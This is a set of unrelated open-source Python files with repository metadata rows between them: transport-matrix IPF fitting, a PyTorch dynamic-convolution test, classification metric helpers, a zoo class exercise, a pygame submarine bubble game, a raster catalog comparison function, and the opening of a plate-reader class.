raise ValueError("production/rows vector must be a float type")
if not np.issubdtype(col_data[self.column_field].dtype, np.floating):
raise ValueError("Attraction/columns vector must be a float type")
# Check data dimensions
if not np.array_equal(self.rows.index, self.columns.index):
raise ValueError("Indices from row vector do not match those from column vector")
if not np.array_equal(self.matrix.index, self.columns.index):
raise ValueError("Indices from vectors do not match those from seed matrix")
# Check if matrix was set for computation
if self.matrix.matrix_view is None:
raise ValueError("Matrix needs to be set for computation")
else:
if len(self.matrix.matrix_view.shape[:]) > 2:
raise ValueError("Matrix' computational view needs to be set for a single matrix core")
if self.error is None:
# check balancing:
sum_rows = np.nansum(row_data[self.row_field])
sum_cols = np.nansum(col_data[self.column_field])
if abs(sum_rows - sum_cols) > self.parameters["balancing tolerance"]:
self.error = "Vectors are not balanced"
else:
# guarantees that they are precisely balanced
col_data[self.column_field][:] = col_data[self.column_field][:] * (sum_rows / sum_cols)
if self.error is not None:
self.error_free = False
def __check_parameters(self):
for i in self.__required_parameters:
if i not in self.parameters:
self.error = "Parameters error. It needs to be a dictionary with the following keys: "
for t in self.__required_parameters:
self.error = self.error + t + ", "
if self.error:
raise ValueError(self.error)
def fit(self):
"""Runs the IPF instance problem to adjust the matrix
Resulting matrix is the *output* class member
"""
self.procedure_id = uuid4().hex
self.procedure_date = str(datetime.today())
t = perf_counter()
self.__check_data()
if self.error_free:
max_iter = self.parameters["max iterations"]
conv_criteria = self.parameters["convergence level"]
if self.matrix.is_omx():
self.output = AequilibraeMatrix()
self.output.create_from_omx(
self.output.random_name(), self.matrix.file_path, cores=self.matrix.view_names
)
self.output.computational_view()
else:
self.output = self.matrix.copy(self.output_name, memory_only=True)
if self.nan_as_zero:
self.output.matrix_view[:, :] = np.nan_to_num(self.output.matrix_view)[:, :]
rows = self.rows.data[self.row_field]
columns = self.columns.data[self.column_field]
tot_matrix = np.nansum(self.output.matrix_view[:, :])
# Reporting
self.report.append("Target convergence criteria: " + str(conv_criteria))
self.report.append("Maximum iterations: " + str(max_iter))
self.report.append("")
self.report.append("Rows:" + str(self.rows.entries))
self.report.append("Columns: " + str(self.columns.entries))
self.report.append("Total of seed matrix: " + "{:28,.4f}".format(float(tot_matrix)))
self.report.append("Total of target vectors: " + "{:25,.4f}".format(float(np.nansum(rows))))
self.report.append("")
self.report.append("Iteration, Convergence")
self.gap = conv_criteria + 1
seed = np.array(self.output.matrix_view[:, :], copy=True)
iter, self.gap = ipf_core(
seed, rows, columns, max_iterations=max_iter, tolerance=conv_criteria, cores=self.cpus
)
self.output.matrix_view[:, :] = seed[:, :]
self.report.append(str(iter) + " , " + str("{:4,.10f}".format(float(np.nansum(self.gap)))))
self.report.append("")
self.report.append("Running time: " + str("{:4,.3f}".format(perf_counter() - t)) + "s")
def save_to_project(self, name: str, file_name: str, project=None) -> MatrixRecord:
"""Saves the matrix output to the project file
:Arguments:
**name** (:obj:`str`): Name of the desired matrix record
**file_name** (:obj:`str`): Name for the matrix file name. AEM and OMX supported
**project** (:obj:`Project`, Optional): Project we want to save the results to.
Defaults to the active project
"""
project = project or get_active_project()
mats = project.matrices
record = mats.new_record(name, file_name, self.output)
record.procedure_id = self.procedure_id
record.timestamp = self.procedure_date
record.procedure = "Iterative Proportional fitting"
record.save()
return record
def __tot_rows(self, matrix):
return np.nansum(matrix, axis=1)
def __tot_columns(self, matrix):
return np.nansum(matrix, axis=0)
def __factor(self, marginals, targets):
f = np.divide(targets, marginals) # We compute the factors
f[f == np.NINF] = 1 # And treat the errors
return f
def __get_parameters(self, model):
path = os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
with open(path + "/parameters.yml", "r") as yml:
path = yaml.safe_load(yml)
self.cpus = int(path["system"]["cpus"])
return path["distribution"][model]
|
AequilibraE/aequilibrae
|
aequilibrae/distribution/ipf.py
|
ipf.py
|
py
| 10,544 |
python
|
en
|
code
| 140 |
github-code
|
6
|
32483785153
|
import random
from collections import Counter
import torch
import torch.nn as nn
import torch.nn.functional as F
from mmcv.cnn import ConvModule, Scale, bias_init_with_prob, normal_init
from mmcv.runner import force_fp32
import nltk
from nltk.cluster.kmeans import KMeansClusterer
from mmdet.core import (anchor_inside_flags, bbox_overlaps, build_assigner,
build_sampler, images_to_levels, multi_apply,
reduce_mean, unmap)
from mmdet.core.utils import filter_scores_and_topk
class attention1d(nn.Module):
def __init__(self, in_planes=1, ratios=16, K=4, temperature=1, init_weight=True): # quality map
super(attention1d, self).__init__()
assert temperature % 3 == 1
if in_planes != 3:
hidden_planes = int(in_planes * ratios)
else:
hidden_planes = K
self.fc1 = nn.Conv2d(in_planes, hidden_planes, 1, bias=False)
# self.bn = nn.BatchNorm2d(hidden_planes)
self.fc2 = nn.Conv2d(hidden_planes, K, 1, bias=True)
self.temperature = temperature
self.K = K
if init_weight:
self._initialize_weights()
def _initialize_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
if m.bias is not None:
nn.init.constant_(m.bias, 0)
if isinstance(m ,nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
def updata_temperature(self):
if self.temperature!=1:
self.temperature -= 3
print('Change temperature to:', str(self.temperature))
def forward(self, x):
_N, _C, _H, _W = x.size()
x = self.fc1(x)
x = F.relu(x)
x = self.fc2(x)
return F.softmax(x / self.temperature, 1)
class Dynamic_conv1d(nn.Module):
'''
Args:
x(Tensor): shape (batch, in_channel, height, width)
quality_map(Tensor): shape (batch, 1, height, width)
Return:
output(Tensor): shape (batch, out_channel, height, width)
Note:
in_channel must eqal to out_channel
'''
def __init__(self, in_planes, out_planes, ratio=16.0, stride=1, padding=0, dilation=1, bias=True, K=2,temperature=1, init_weight=True):
super(Dynamic_conv1d, self).__init__()
self.in_planes = in_planes
self.out_planes = out_planes
self.stride = stride
self.padding = padding
self.dilation = dilation
self.bias = bias
self.K = K
self.attention = attention1d(1, ratio, K, temperature)
self.weight = nn.Parameter(torch.randn(K, out_planes, in_planes), requires_grad=True)
if bias:
self.bias = nn.Parameter(torch.zeros(K, out_planes))
else:
self.bias = None
if init_weight:
self._initialize_weights()
#TODO 初始化
def _initialize_weights(self): # maybe problematic
for i in range(self.K):
nn.init.kaiming_uniform_(self.weight[i])
def update_temperature(self):
self.attention.updata_temperature()
def forward(self, x, quality_map):# a different version of dynamic convlution, is another kind of spatial attention
residule = x
batch_size, in_planes, height, width = x.size()
softmax_attention = self.attention(quality_map)
print(f'attention size {softmax_attention.size()}')
print(f'attention {softmax_attention}')
softmax_attention = softmax_attention.permute(0, 2, 3, 1)
print(f'attention size after {softmax_attention.size()}')
print(f'attention after {softmax_attention}')
#x = x.view(1, -1, width, height)# 变化成一个维度进行组卷积
#weight = self.weight.view(self.K, -1)
# 动态卷积的权重的生成, 生成的是batch_size个卷积参数(每个参数不同)
#weight = weight.view(self.K, self.in_planes, self.out_planes)
# print(f'softmax_attention {softmax_attention.size()}')
# print(f'self.weight {self.weight.size()}')
weight = self.weight.view(self.K, -1)
print(f'weight size {weight.size()}')
print(f'weight {weight}')
aggregate_weight = torch.matmul(softmax_attention, weight).view(batch_size, height, width, self.out_planes, self.in_planes)# (N, H, W, C2, C1)
print(f'aggregate_weight size {aggregate_weight.size()}')
print(f'aggregate_weight {aggregate_weight}')
aggregate_weight = aggregate_weight.permute(3, 0, 4, 1, 2) # (C2, N, C1, H, W)
print(f'aggregate_weight after size {aggregate_weight.size()}')
print(f'aggregate_weight after {aggregate_weight}')
output = aggregate_weight * x[None, :, :, :, :]
# if self.bias is not None:
# aggregate_bias = torch.matmul(softmax_attention, self.bias).permute(0, 3, 1, 2) # (N, C1, H, W)
# print(aggregate_bias.size())
# print(softmax_attention.size())
# output = output + aggregate_bias
output = output.sum(dim=0) # (N, C1, H, W)
return residule + output
dy1 = Dynamic_conv1d(2, 1)
x = torch.tensor([[[[1, 2],[3, 4]],[[5, 6],[7, 8]]]], dtype=torch.float32)
y = torch.tensor([[[[1,2],[3,4]]]], dtype=torch.float32)
print(f'x size {x.size()}')
print(f'x {x}')
print(f'y size {y.size()}')
print(f'y {y}')
result = dy1(x, y)
print(f'output size {result.size()}')
print(f'output {result}')
|
johnran103/mmdet
|
test_dy_conv.py
|
test_dy_conv.py
|
py
| 5,635 |
python
|
en
|
code
| 1 |
github-code
|
6
|
17940292131
|
from sklearn.metrics import confusion_matrix, roc_auc_score
import json
import numpy as np
def general_result(y_true, y_score, threshold=0.6):
def pred(score, best_thresh):
label = 0
if score > best_thresh:
label = 1
return label
y_score = np.array(y_score)
if len(y_score.shape) == 2:
y_score = y_score[:,1]
# best_thresh = select_threshold(y_true, y_score)
best_thresh = threshold
y_pred = [pred(score, best_thresh) for score in y_score]
c_m = confusion_matrix(y_true, y_pred)
print("model works on the data, the confusion_matrix is:(Threshold:{})".format(str(best_thresh)), c_m)
acc = (c_m[0, 0]+c_m[1, 1])/(c_m[0, 0]+c_m[0, 1]+c_m[1, 0]+c_m[1, 1])
print("model works on the data, the accuracy is:", acc)
pre = c_m[1, 1]/(c_m[1, 1]+c_m[0, 1])
print("model works on the data, the precision is:", pre)
re = c_m[1, 1]/(c_m[1, 1]+c_m[1, 0])
print("model works on the data, the recall is:", re)
f_score = (2*pre*re)/(pre+re)
print("model works on the data, the F1-score is:", f_score)
#train_label_binary = to_categorical(train_label)
auc = roc_auc_score(y_true, y_score)
print("model works on the data, the auc is:", auc)
def select_threshold(y_true, y_score):
def pred(score, threshold):
label = 0
if score > threshold:
label = 1
return label
best_th = 0
f1_score = 0
output = {'Precision':[], 'Recall':[]}
for i in range(1,100):
threshold = i/100
y_pred = [pred(score, threshold) for score in y_score]
c_m = confusion_matrix(y_true, y_pred)
try:
pre = c_m[1, 1]/(c_m[1, 1]+c_m[0, 1])
re = c_m[1, 1]/(c_m[1, 1]+c_m[1, 0])
output['Precision'].append(pre)
output['Recall'].append((re))
f_score = (2*pre*re)/(pre+re)
if f_score>f1_score :
f1_score = f_score
best_th = threshold
except:
continue
if len(output['Precision']) != 99:
print("Unknown Error occurred when generate results.")
with open('Precision_Recall.txt','w') as w:
w.write(json.dumps(output))
return best_th
|
jingmouren/antifraud
|
antifraud/metrics/normal_function.py
|
normal_function.py
|
py
| 2,233 |
python
|
en
|
code
| 0 |
github-code
|
6
|
71567880507
|
class Zoo:
__animals = 0
def __init__(self, name):
self.name = name
self.mammals =[]
self.fishes = []
self.birds = []
def add_animal(self, species, name):
if species == 'mammal':
self.mammals.append(name)
elif species == 'fish':
self.fishes.append(name)
elif species == 'bird':
self.birds.append(name)
Zoo.__animals +=1
def get_info(self, species):
result = ''
if species == 'mammal':
result += f"Mammals in {self.name}: {', '.join(self.mammals)}"
elif species == 'fish':
result += f"Fishes in {self.name}: {', '.join(self.fishes)}"
elif species == 'bird':
result += f"Birds in {self.name}: {', '.join(self.birds)}"
result += f'\nTotal animals: {Zoo.__animals}'
return result
name_of_zoo = input()
zoo = Zoo(name_of_zoo)
number_of_lines = int(input())
for _ in range(number_of_lines):
info = input().split(' ')
species = info[0]
type_of_animal = info[1]
zoo.add_animal(species, type_of_animal)
additional_info = input()
print(zoo.get_info(additional_info))
|
lorindi/SoftUni-Software-Engineering
|
Programming-Fundamentals-with-Python/6.Objects and Classes/4_zoo.py
|
4_zoo.py
|
py
| 1,179 |
python
|
en
|
code
| 3 |
github-code
|
6
|
36396554295
|
"""
Compare catalogs of candidates and benchmarks.
"""
from __future__ import annotations
# __all__ = ['*']
__author__ = "Fernando Aristizabal"
from typing import Iterable, Optional, Callable, Tuple
import os
import pandas as pd
from rioxarray import open_rasterio as rxr_or
import xarray as xr
import dask.dataframe as dd
def catalog_compare(
candidate_catalog: pd.DataFrame | dd.DataFrame,
benchmark_catalog: pd.DataFrame | dd.DataFrame,
map_ids: str | Iterable[str],
how: str = "inner",
on: Optional[str | Iterable[str]] = None,
left_on: Optional[str | Iterable[str]] = None,
right_on: Optional[str | Iterable[str]] = None,
suffixes: tuple[str, str] = ("_candidate", "_benchmark"),
merge_kwargs: Optional[dict] = None,
open_kwargs: Optional[dict] = None,
compare_type: str | Callable = "continuous",
compare_kwargs: Optional[dict] = None,
agreement_map_field: Optional[str] = None,
agreement_map_write_kwargs: Optional[dict] = None,
) -> pd.DataFrame | dd.DataFrame:
"""
Compare catalogs of candidate and benchmark maps.
Parameters
----------
candidate_catalog : pandas.DataFrame | dask.DataFrame
Candidate catalog.
benchmark_catalog : pandas.DataFrame | dask.DataFrame
Benchmark catalog.
map_ids : str | Iterable of str
Column name(s) where maps or paths to maps occur. If str is given, then the same value should occur in both catalogs. If Iterable[str] is given of length 2, then the column names where maps are will be in [candidate, benchmark] respectively.
The columns corresponding to map_ids should have either str, xarray.DataArray, xarray.Dataset, rasterio.io.DatasetReader, rasterio.vrt.WarpedVRT, or os.PathLike objects.
how : str, default = "inner"
Type of merge to perform. See pandas.DataFrame.merge for more information.
on : str | Iterable of str, default = None
Column(s) to join on. Must be found in both catalogs. If None, and left_on and right_on are also None, then the intersection of the columns in both catalogs will be used.
left_on : str | Iterable of str, default = None
Column(s) to join on in left catalog. Must be found in left catalog.
right_on : str | Iterable of str, default = None
Column(s) to join on in right catalog. Must be found in right catalog.
suffixes : tuple of str, default = ("_candidate", "_benchmark")
Suffixes to apply to overlapping column names in candidate and benchmark catalogs, respectively. Length two tuple of strings.
merge_kwargs : dict, default = None
Keyword arguments to pass to pandas.DataFrame.merge.
compare_type : str | Callable, default = "continuous"
Type of comparison to perform. If str, then must be one of {"continuous", "categorical", "probabilistic"}. If Callable, then must be a function that takes two xarray.DataArray or xarray.Dataset objects and returns a tuple of length 2. The first element of the tuple must be an xarray.DataArray or xarray.Dataset object representing the agreement map. The second element of the tuple must be a pandas.DataFrame object representing the metrics.
compare_kwargs : dict, default = None
Keyword arguments to pass to the compare_type function.
agreement_map_field : str, default = None
Column name to write agreement maps to. If None, then agreement maps will not be written to file.
agreement_map_write_kwargs : dict, default = None
Keyword arguments to pass to xarray.DataArray.rio.to_raster when writing agreement maps to file.
Raises
------
ValueError
If map_ids is not str or Iterable of str.
If compare_type is not str or Callable.
If compare_type is str and not one of {"continuous", "categorical", "probabilistic"}.
NotImplementedError
If compare_type is "probabilistic".
Returns
-------
pandas.DataFrame | dask.DataFrame
Agreement catalog.
"""
# unpack map_ids
if isinstance(map_ids, str):
candidate_map_ids, benchmark_map_ids = map_ids, map_ids
elif isinstance(map_ids, Iterable):
candidate_map_ids, benchmark_map_ids = map_ids
else:
raise ValueError("map_ids must be str or Iterable of str")
# set merge_kwargs to empty dict if None
if merge_kwargs is None:
merge_kwargs = dict()
# create agreement catalog
agreement_catalog = candidate_catalog.merge(
benchmark_catalog,
how=how,
on=on,
left_on=left_on,
right_on=right_on,
suffixes=suffixes,
**merge_kwargs,
)
def compare_row(
row,
compare_type: str | Callable,
compare_kwargs: dict,
open_kwargs: dict,
agreement_map_field: str,
agreement_map_write_kwargs: dict,
) -> Tuple[xr.DataArray | xr.Dataset, pd.DataFrame]:
"""Compares catalog and benchmark maps by rows"""
def loadxr(map, open_kwargs):
"""load xarray object if not already"""
return (
map
if isinstance(map, (xr.DataArray, xr.Dataset))
else rxr_or(map, **open_kwargs)
)
# load maps
candidate_map = loadxr(row[candidate_map_ids + suffixes[0]], open_kwargs)
benchmark_map = loadxr(row[benchmark_map_ids + suffixes[1]], open_kwargs)
# set compare_kwargs to empty dict if None
if compare_kwargs is None:
compare_kwargs = dict()
# set agreement_map_write_kwargs to empty dict if None
if agreement_map_write_kwargs is None:
agreement_map_write_kwargs = dict()
if isinstance(compare_type, str):
if compare_type == "categorical":
results = candidate_map.gval.categorical_compare(
benchmark_map, **compare_kwargs
)
# results is a tuple of length 3 or 4
# agreement_map, crosstab_df, metrics_df, attrs_df = results
# where attrs_df is optional
agreement_map, metrics_df = results[0], results[2]
elif compare_type == "continuous":
results = candidate_map.gval.continuous_compare(
benchmark_map, **compare_kwargs
)
# results is a tuple of length 2 or 3
# agreement_map, metrics_df, attrs_df = results
# where attrs_df is optional
agreement_map, metrics_df = results[:2]
elif compare_type == "probabilistic":
raise NotImplementedError(
"probabilistic comparison not implemented yet"
)
else:
raise ValueError(
"compare_type of type str must be one of {'continuous', 'categorical', 'probabilistic'}"
)
elif isinstance(compare_type, Callable):
agreement_map, metrics_df = compare_type(
candidate_map, benchmark_map, **compare_kwargs
)
else:
raise ValueError("compare_type must be str or Callable")
# write agreement map to file
if (agreement_map_field is not None) & isinstance(
agreement_map, (xr.DataArray, xr.Dataset)
):
if isinstance(row[agreement_map_field], (str, os.PathLike)):
agreement_map.rio.to_raster(
row[agreement_map_field], **agreement_map_write_kwargs
)
return metrics_df
# make kwargs for dask apply
if isinstance(agreement_catalog, dd.DataFrame):
dask_kwargs = {"meta": ("output", "f8")}
else:
dask_kwargs = {}
# set open_kwargs to empty dict if None
if open_kwargs is None:
open_kwargs = dict()
# apply compare_row to each row of agreement_catalog
metrics_df = agreement_catalog.apply(
compare_row,
axis=1,
**dask_kwargs,
compare_type=compare_type,
open_kwargs=open_kwargs,
compare_kwargs=compare_kwargs,
agreement_map_field=agreement_map_field,
agreement_map_write_kwargs=agreement_map_write_kwargs,
)
def nested_merge(i, sub_df) -> pd.DataFrame:
"""Duplicated agreement row for each row in sub_df"""
try:
agreement_row = agreement_catalog.iloc[i].to_frame().T
except NotImplementedError:
agreement_row = agreement_catalog.loc[agreement_catalog.index == i]
sub_df.index = [i] * len(sub_df)
return agreement_row.join(sub_df)
# merge agreement_catalog with metrics_df
if isinstance(metrics_df, dd.Series):
return dd.concat(
[nested_merge(i, sub_df) for i, sub_df in enumerate(metrics_df)]
).reset_index(drop=True)
if isinstance(metrics_df, pd.Series):
return pd.concat(
[nested_merge(i, sub_df) for i, sub_df in enumerate(metrics_df)]
).reset_index(drop=True)
|
NOAA-OWP/gval
|
src/gval/catalogs/catalogs.py
|
catalogs.py
|
py
| 9,027 |
python
|
en
|
code
| 14 |
github-code
|
6
|
1547074247
|
from settings import *
# Import Data
df = pd.read_csv("data/mpg_ggplot2.csv")
# Draw Stripplot
fig, ax = plt.subplots(figsize=(16, 10), dpi=80)
sns.stripplot(df.cty, df.hwy, jitter=0.25, size=8, ax=ax, linewidth=.5)
# Decorations
plt.title('Use jittered plots to avoid overlapping of points', fontsize=22)
plt.show()
|
Rygor83/Plotting_with_python
|
05.py
|
05.py
|
py
| 320 |
python
|
en
|
code
| 1 |
github-code
|
6
|
29643271631
|
# -*- coding: utf-8 -*-
# (c) 2015 Alfredo de la Fuente - AvanzOSC
# License AGPL-3 - See http://www.gnu.org/licenses/agpl-3.0.html
from openerp import models, fields, api
from dateutil.relativedelta import relativedelta
class ProcurementOrder(models.Model):
_inherit = 'procurement.order'
@api.multi
def _compute_protect_date_planned(self):
for proc in self:
proc.protect_date_planned = False
if (proc.purchase_line_id and
proc.purchase_line_id.order_id.state != 'draft'):
proc.protect_date_planned = True
plan = fields.Many2one('procurement.plan', string='Plan')
location_type = fields.Selection([
('supplier', 'Supplier Location'),
('view', 'View'),
('internal', 'Internal Location'),
('customer', 'Customer Location'),
('inventory', 'Inventory'),
('procurement', 'Procurement'),
('production', 'Production'),
('transit', 'Transit Location')],
string='Location Type', related="location_id.usage", store=True)
protect_date_planned = fields.Boolean(
string='Protect Date Planned', compute='_compute_protect_date_planned')
@api.model
def create(self, data):
if 'plan' in self.env.context and 'plan' not in data:
data['plan'] = self.env.context.get('plan')
procurement = super(ProcurementOrder, self).create(data)
return procurement
@api.multi
def button_remove_plan(self):
self.ensure_one()
template_obj = self.env['product.template']
result = template_obj._get_act_window_dict(
'procurement_plan.action_procurement_plan')
result['domain'] = "[('id', '=', " + str(self.plan.id) + ")]"
result['res_id'] = self.plan.id
result['view_mode'] = 'form'
result['views'] = []
self.plan.write({'procurement_ids': [[3, self.id]]})
return result
@api.multi
def button_run(self, autocommit=False):
for procurement in self:
procurement.with_context(plan=procurement.plan.id).run(
autocommit=autocommit)
procurement.plan._get_state()
plans = self.mapped('plan')
if not plans:
return True
res = {'view_type': 'form,tree',
'res_model': 'procurement.plan',
'view_id': False,
'type': 'ir.actions.act_window',
}
if len(plans) == 1:
res.update({'view_mode': 'form',
'res_id': plans[0].id,
'target': 'current'})
else:
res.update({'view_mode': 'tree',
'domain': [('id', 'in', plans.ids)],
'target': 'new'})
return res
@api.multi
def button_check(self, autocommit=False):
for procurement in self:
procurement.with_context(plan=procurement.plan.id).check(
autocommit=autocommit)
procurement.plan._get_state()
plans = self.mapped('plan')
if not plans:
return True
if not plans:
return True
res = {'view_type': 'form,tree',
'res_model': 'procurement.plan',
'view_id': False,
'type': 'ir.actions.act_window',
}
if len(plans) == 1:
res.update({'view_mode': 'form',
'res_id': plans[0].id,
'target': 'current'})
else:
res.update({'view_mode': 'tree',
'domain': [('id', 'in', plans.ids)],
'target': 'new'})
return res
@api.multi
def cancel(self):
super(ProcurementOrder, self).cancel()
for procurement in self:
if procurement.plan:
procurement.plan._get_state()
plans = self.mapped('plan')
if not plans:
return True
if not plans:
return True
res = {'view_type': 'form,tree',
'res_model': 'procurement.plan',
'view_id': False,
'type': 'ir.actions.act_window',
}
if len(plans) == 1:
res.update({'view_mode': 'form',
'res_id': plans[0].id,
'target': 'current'})
else:
res.update({'view_mode': 'tree',
'domain': [('id', 'in', plans.ids)],
'target': 'new'})
return res
@api.multi
def reset_to_confirmed(self):
super(ProcurementOrder, self).reset_to_confirmed()
for procurement in self:
if procurement.plan:
procurement.plan._get_state()
plans = self.mapped('plan')
if not plans:
return True
if not plans:
return True
res = {'view_type': 'form,tree',
'res_model': 'procurement.plan',
'view_id': False,
'type': 'ir.actions.act_window',
}
if len(plans) == 1:
res.update({'view_mode': 'form',
'res_id': plans[0].id,
'target': 'current'})
else:
res.update({'view_mode': 'tree',
'domain': [('id', 'in', plans.ids)],
'target': 'new'})
return res
@api.multi
def _change_date_planned_from_plan_for_po(self, days_to_sum):
for proc in self:
new_date = (fields.Datetime.from_string(proc.date_planned) +
(relativedelta(days=days_to_sum)))
proc.write({'date_planned': new_date})
if (proc.purchase_line_id and
proc.purchase_line_id.order_id.state == 'draft'):
proc.purchase_line_id.write({'date_planned': new_date})
|
odoomrp/odoomrp-wip
|
procurement_plan/models/procurement.py
|
procurement.py
|
py
| 5,931 |
python
|
en
|
code
| 119 |
github-code
|
6
|
35093472448
|
import pygame, sys, operator, random, time
from pygame.locals import *
# Global variables
WIDTH = 800
HEIGHT = 500
SUB_SPEED = 3
BUBBLE_MAX_SPEED = 1
TIME_LIMIT = 30
BONUS_SCORE = 1500
BLACK = (0, 0, 0)
BLUE = (12,34,56)
RED = (255,0,0)
WHITE = (255,255,255)
x_sub = 40
y_sub = 250
score = 0
game_end = time.time() + TIME_LIMIT
bonus = 0
# bubbles_id = list()
bubbles_pos = list()
bubbles_speed = list()
bubbles_state = list()
bubbles_size = list()
# Quit the game
def leave_game():
pygame.display.quit()
pygame.quit()
sys.exit()
# Update the screen display
def update_screen ():
screen.blit(background_image, (0,0))
screen.blit(sub, (x_sub, y_sub))
for i in range(len(bubbles_pos) - 1, -1, -1):
if bubbles_state[i] == "Good":
screen.blit(pygame.transform.scale(blue_bubble, (bubbles_size[i], bubbles_size[i])), bubbles_pos[i])
else:
screen.blit(pygame.transform.scale(bad_bubble, (bubbles_size[i], bubbles_size[i])), bubbles_pos[i])
message = "Score : " + str(score)
display_text (message, BLACK, 'Calibri', 20, 10, 15)
# print ("Time : ", int(game_end - time.time()))
message = "Time : " + str(int(game_end - time.time()))
display_text (message, BLACK, 'Calibri', 20, 700, 15)
pygame.display.flip()
# Move the submarine on the scene
def sub_control():
global x_sub, y_sub
key = pygame.key.get_pressed()
if key[pygame.K_RIGHT]:
x_sub += SUB_SPEED
if key[pygame.K_LEFT]:
x_sub -= SUB_SPEED
if key[pygame.K_UP]:
y_sub -= SUB_SPEED
if key[pygame.K_DOWN]:
y_sub += SUB_SPEED
sub_in_scene()
# Check if the sub is still on the visible part of the screen
def sub_in_scene():
global x_sub, y_sub
if x_sub < 0:
x_sub = 0
if y_sub < 0:
y_sub = 0
if x_sub + sub.get_width() > WIDTH:
x_sub = WIDTH - sub.get_width()
if y_sub + sub.get_height() > HEIGHT:
y_sub = HEIGHT - sub.get_height()
# Create many bubbles
def create_bubbles(state) :
x_bubble = WIDTH
y_bubble = random.randint(0, HEIGHT)
if state == "Good":
#bubble = pygame.image.load("Ressources/bulle.png")
size_bubble = random.randint(blue_bubble.get_width() / 3, blue_bubble.get_width() * 2)
else:
#bubble = pygame.image.load("Ressources/red_bulle.png")
size_bubble = random.randint(bad_bubble.get_width(), bad_bubble.get_width() * 3)
# bubble = pygame.transform.scale (bubble, (size_bubble, size_bubble))
# bubbles_id.append(bubble)
bubbles_pos.append((x_bubble, y_bubble))
bubbles_speed.append(random.randint(1, BUBBLE_MAX_SPEED))
bubbles_state.append(state)
bubbles_size.append(size_bubble)
# Move the bubble on the screen at set speed
def move_bubbles():
for i in range (len(bubbles_pos) - 1, -1, -1) :
bubbles_pos[i] = tuple(map(operator.sub, bubbles_pos[i], (bubbles_speed[i], 0)))
# Update bubble position
def update_game():
global bonus, game_end
if (random.randint(1, 20) == 1):
create_bubbles("Good")
if (random.randint(1, 60) == 1):
create_bubbles("Bad")
collision()
if (int(score / BONUS_SCORE)) > bonus:
bonus += 1
game_end += TIME_LIMIT
move_bubbles()
clean_bubbles()
# Collision between the sub and the bubbles
def collision () :
global score, game_end
for bubble in range(len(bubbles_pos) -1, -1, -1):
if (x_sub < bubbles_pos[bubble][0] + bubbles_size[bubble]
and x_sub + sub.get_width() > bubbles_pos[bubble][0]
and y_sub < bubbles_pos[bubble][1] + bubbles_size[bubble]
and y_sub + sub.get_height() > bubbles_pos[bubble][1]) :
# print ("La bulle ", bubble, "se superpose au sous-marin")
print("etat de la bulle : ", bubbles_state[bubble])
if bubbles_state[bubble] == "Good":
score += bubbles_size[bubble] + bubbles_speed[bubble]
else:
game_end -= 5
# print ("points : ", score)
pop_sound.play(0)
delete_bubble (bubble)
# Delete Bubble when it collides with the submarine
def delete_bubble (bubble):
del bubbles_state[bubble]
del bubbles_speed[bubble]
del bubbles_pos[bubble]
del bubbles_size[bubble]
# del bubbles_id[bubble]
# Remove bubbles who leave the screen
def clean_bubbles ():
for i in range (len(bubbles_pos) - 1, -1, -1) :
if (bubbles_pos[i][0] + bubbles_size[i] < 0) :
delete_bubble(i)
# Display colored text in position X and Y
def display_text(text, color, font, font_size, x, y):
myfont = pygame.font.SysFont(font, font_size, True)
message = myfont.render(text, True, color)
screen.blit(message, (x,y))
# Game Over Screen
def game_over_message():
pygame.mixer.stop()
lose_sound.play(0)
screen.fill(BLUE)
display_text("GAME OVER !", RED, 'Calibri', 40, WIDTH * 0.4, HEIGHT * 0.2 )
message = "Ton Score : " + str(score)
display_text(message, RED, 'Calibri', 40, WIDTH * 0.37, HEIGHT * 0.4 )
display_text("Appuie sur R pour rejouer !", WHITE, 'Calibri', 30, WIDTH * 0.33, HEIGHT * 0.6)
# Initialize game variables when restart
def init_game():
global score, x_sub, y_sub, game_end, bubbles_pos, bubbles_size, bubbles_speed, bubbles_state
game_end = time.time() + TIME_LIMIT
score = 0
x_sub = 40
y_sub = 250
# bubbles_id = list()
bubbles_pos = list()
bubbles_size = list()
bubbles_speed = list()
bubbles_state = list()
# Window Init
pygame.init()
# Display creation
screen = pygame.display.set_mode ((WIDTH, HEIGHT))
# Set the repetition rate of the key
pygame.key.set_repeat(1, 1)
# Window Name
pygame.display.set_caption("Bubble Blaster")
# The Background image
background_image = pygame.image.load("Ressources/ocean.jpg")
# The submarine
sub = pygame.image.load("Ressources/submarine.png")
# The bubble
blue_bubble = pygame.image.load("Ressources/blue_bubble.png")
bad_bubble = pygame.image.load("Ressources/red_bubble.png")
pop_sound = pygame.mixer.Sound("Ressources/collect.wav")
ambient_sound = pygame.mixer.Sound("Ressources/ambient_music.wav")
lose_sound = pygame.mixer.Sound("Ressources/lose.wav")
ambient_sound.set_volume(0.05)
#create_bubble()
# Main loop
while True:
pygame.mixer.stop()
ambient_sound.play(-1)
# Time loop
while time.time() < game_end:
# move_bubble()
update_game()
update_screen()
# Main event loop
for event in pygame.event.get() :
if event.type == pygame.QUIT:
leave_game()
sub_control()
game_over_message()
pygame.display.flip()
restart = False
while not restart:
# Event Manager Loop
for event in pygame.event.get() :
if event.type == pygame.QUIT:
leave_game()
if not hasattr (event, 'key'):
continue
if event.key == K_r:
restart = True
init_game()
## if event.key == K_ESCAPE:
## leave_game()
|
nicoseng/bubble_blaster
|
test.py
|
test.py
|
py
| 7,112 |
python
|
en
|
code
| 0 |
github-code
|
6
|
9799846415
|
# CSC_120 Logbook : Pg 9, Exercise 4
# Start Program
# Variable declaration and initialization
v = 512
w = 282
x = 47.48
y = 5
# Calculation phase
z = (v - w) / (x + y)
# Outputs the result of the computation
print("The result of the computation is : ", z)
# End Program
|
Muhdal-Amin/CSC_120_pg9
|
compute/compute.py
|
compute.py
|
py
| 277 |
python
|
en
|
code
| 0 |
github-code
|
6
|
20269902024
|
import os.path
import math
import numpy
import json
import bz2
import platereader
from platereader.replicate import Replicate
from platereader.statusmessage import StatusMessage, Severity
from platereader.csvunicode import CsvFileUnicodeWriter, CsvFileUnicodeReader
from platereader.parser import tecan, bioscreen
class Plate(object):
"""
Class containing the wells and holding plate-wide parameters.
"""
_parser2module = platereader.parser.modulenameToModule(
list(platereader.parser.getModulesOfNamespace(platereader.parser)),
replace='platereader.parser.',
lower=True)
_isNotPlateParameter={
'allowMaxGrowthrateAtLowerCutoff': True,
'allowGrowthyieldSlopeNStderrAwayFromZero': True,
}
